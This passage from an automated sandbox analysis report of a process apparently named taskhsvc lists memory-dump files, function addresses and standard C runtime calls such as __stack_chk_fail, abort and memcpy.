    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002339FC, Relevance: 1.6, APIs: 1, Instructions: 58
    APIs
      • Part of subcall function 002B3F06: abort.MSVCRT ref: 002B3F62
      • Part of subcall function 002B3F06: __stack_chk_fail.LIBSSP-0 ref: 002B3F72
      • Part of subcall function 0023368C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,00234A6D,?,?,?,?,?,00236C3A), ref: 002336E8
      • Part of subcall function 002B2C5F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00233A48), ref: 002B2C98
      • Part of subcall function 002336F3: __stack_chk_fail.LIBSSP-0 ref: 00233769
    • __stack_chk_fail.LIBSSP-0 ref: 00233AAE
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00261FCB, Relevance: 1.5, APIs: 1, Instructions: 47
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0024E04C, Relevance: 1.5, APIs: 1, Instructions: 44
    APIs
      • Part of subcall function 0024DAFE: abort.MSVCRT ref: 0024DB99
      • Part of subcall function 0024DAFE: memcpy.MSVCRT ref: 0024DD2D
      • Part of subcall function 0024DAFE: memcpy.MSVCRT ref: 0024DD5A
      • Part of subcall function 0024DAFE: memcpy.MSVCRT ref: 0024DDF6
      • Part of subcall function 0024DAFE: __stack_chk_fail.LIBSSP-0 ref: 0024DE68
    • __stack_chk_fail.LIBSSP-0 ref: 0024E0EB
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003267DB, Relevance: 1.5, APIs: 1, Instructions: 43
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 003265E9: strerror.MSVCRT ref: 003266A8
      • Part of subcall function 003265E9: abort.MSVCRT ref: 00326730
      • Part of subcall function 003265E9: __stack_chk_fail.LIBSSP-0 ref: 00326762
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
    • __stack_chk_fail.LIBSSP-0 ref: 0032685E
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F15D5, Relevance: 1.5, APIs: 1, Instructions: 42
    APIs
      • Part of subcall function 001E5B8F: atoi.MSVCRT ref: 001E5DE7
      • Part of subcall function 001E5B8F: abort.MSVCRT ref: 001E5F86
      • Part of subcall function 001E5B8F: __stack_chk_fail.LIBSSP-0 ref: 001E5FE0
    • __stack_chk_fail.LIBSSP-0 ref: 001F1652
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0024E0F2, Relevance: 1.5, APIs: 1, Instructions: 41
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 0024E175
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 00237466: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,002C0313), ref: 00237491
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00313842, Relevance: 1.5, APIs: 1, Instructions: 39
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00312E50: abort.MSVCRT ref: 00312F7F
      • Part of subcall function 00312E50: abort.MSVCRT ref: 003131E3
      • Part of subcall function 00312E50: __stack_chk_fail.LIBSSP-0 ref: 00313200
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
